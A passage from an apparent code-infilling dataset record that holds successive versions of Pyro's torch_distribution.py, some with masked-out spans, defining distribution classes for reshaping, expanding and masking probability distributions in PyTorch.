:meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-3": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(\n sample_shape)\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n <mask token>\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n <mask token>\n <mask token>\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-4": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(\n sample_shape)\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n\n def expand(self, batch_shape):\n \"\"\"\n Expands a distribution to a desired\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n Note that this is more general than :meth:`expand_by` because\n ``d.expand_by(sample_shape)`` can be reduced to\n ``d.expand(sample_shape + d.batch_shape)``.\n\n :param torch.Size batch_shape: The target ``batch_shape``. This must\n compatible with ``self.batch_shape`` similar to the requirements\n of :func:`torch.Tensor.expand`: the target ``batch_shape`` must\n be at least as long as ``self.batch_shape``, and for each\n non-singleton dim of ``self.batch_shape``, ``batch_shape`` must\n either agree or be set to ``-1``.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n batch_shape = list(batch_shape)\n if len(batch_shape) < len(self.batch_shape):\n raise ValueError(\n 'Expected len(batch_shape) >= len(self.batch_shape), actual {} vs {}'\n .format(len(batch_shape), len(self.batch_shape)))\n for dim in range(-1, -1 - len(self.batch_shape), -1):\n if batch_shape[dim] == -1:\n batch_shape[dim] = self.batch_shape[dim]\n elif batch_shape[dim] != self.batch_shape[dim]:\n if self.batch_shape[dim] != 1:\n raise ValueError(\n 'Cannot broadcast dim {} of size {} to size {}'.\n format(dim, self.batch_shape[dim], batch_shape[dim]))\n else:\n raise NotImplementedError(\n 'https://github.com/uber/pyro/issues/1119')\n sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]\n return self.expand_by(sample_shape)\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n\n def independent(self, reinterpreted_batch_ndims=None):\n \"\"\"\n Reinterprets the ``n`` rightmost dimensions of this distributions\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`\n as event dims, adding them to the left side of\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n Example::\n\n >>> [d1.batch_shape, d1.event_shape]\n [torch.Size((2, 3)), torch.Size((4, 5))]\n >>> d2 = d1.independent(1)\n >>> [d2.batch_shape, d2.event_shape]\n [torch.Size((2,)), torch.Size((3, 4, 5))]\n >>> d3 = d1.independent(2)\n >>> [d3.batch_shape, d3.event_shape]\n [torch.Size(()), torch.Size((2, 3, 4, 5))]\n\n :param int reinterpreted_batch_ndims: The number of batch dimensions\n to reinterpret as event dimensions.\n :return: A reshaped version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n return ReshapedDistribution(self, reinterpreted_batch_ndims=\n reinterpreted_batch_ndims)\n\n def mask(self, mask):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n :return: A masked copy of this distribution.\n :rtype: :class:`MaskedDistribution`\n \"\"\"\n return MaskedDistribution(self, mask)\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-5": "from __future__ import absolute_import, division, print_function\n\nimport numbers\n\nimport torch\nfrom torch.distributions import constraints\n\nfrom pyro.distributions.distribution import Distribution\nfrom pyro.distributions.score_parts import ScoreParts\nfrom pyro.distributions.util import broadcast_shape, sum_rightmost\n\n\nclass TorchDistributionMixin(Distribution):\n \"\"\"\n Mixin to provide Pyro compatibility for PyTorch distributions.\n\n You should instead use `TorchDistribution` for new distribution classes.\n\n This is mainly useful for wrapping existing PyTorch distributions for\n use in Pyro. Derived classes must first inherit from\n :class:`torch.distributions.distribution.Distribution` and then inherit\n from :class:`TorchDistributionMixin`.\n \"\"\"\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(sample_shape)\n\n @property\n def event_dim(self):\n \"\"\"\n :return: Number of dimensions of individual events.\n :rtype: int\n \"\"\"\n return len(self.event_shape)\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n\n def expand(self, batch_shape):\n \"\"\"\n Expands a distribution to a desired\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n Note that this is more general than :meth:`expand_by` because\n ``d.expand_by(sample_shape)`` can be reduced to\n ``d.expand(sample_shape + d.batch_shape)``.\n\n :param torch.Size batch_shape: The target ``batch_shape``. This must\n compatible with ``self.batch_shape`` similar to the requirements\n of :func:`torch.Tensor.expand`: the target ``batch_shape`` must\n be at least as long as ``self.batch_shape``, and for each\n non-singleton dim of ``self.batch_shape``, ``batch_shape`` must\n either agree or be set to ``-1``.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n batch_shape = list(batch_shape)\n if len(batch_shape) < len(self.batch_shape):\n raise ValueError(\"Expected len(batch_shape) >= len(self.batch_shape), \"\n \"actual {} vs {}\".format(len(batch_shape), len(self.batch_shape)))\n # check sizes of existing dims\n for dim in range(-1, -1 - len(self.batch_shape), -1):\n if batch_shape[dim] == -1:\n batch_shape[dim] = self.batch_shape[dim]\n elif batch_shape[dim] != self.batch_shape[dim]:\n if self.batch_shape[dim] != 1:\n raise ValueError(\"Cannot broadcast dim {} of size {} to size {}\".format(\n dim, self.batch_shape[dim], batch_shape[dim]))\n else:\n raise NotImplementedError(\"https://github.com/uber/pyro/issues/1119\")\n sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]\n return self.expand_by(sample_shape)\n\n def expand_by(self, sample_shape):\n \"\"\"\n Expands a distribution by adding ``sample_shape`` to the left side of\n its :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n To expand internal dims of ``self.batch_shape`` from 1 to something\n larger, use :meth:`expand` instead.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn\n from the distribution.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n return ReshapedDistribution(self, sample_shape=sample_shape)\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception('''\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).''')\n\n def independent(self, reinterpreted_batch_ndims=None):\n \"\"\"\n Reinterprets the ``n`` rightmost dimensions of this distributions\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`\n as event dims, adding them to the left side of\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n Example::\n\n >>> [d1.batch_shape, d1.event_shape]\n [torch.Size((2, 3)), torch.Size((4, 5))]\n >>> d2 = d1.independent(1)\n >>> [d2.batch_shape, d2.event_shape]\n [torch.Size((2,)), torch.Size((3, 4, 5))]\n >>> d3 = 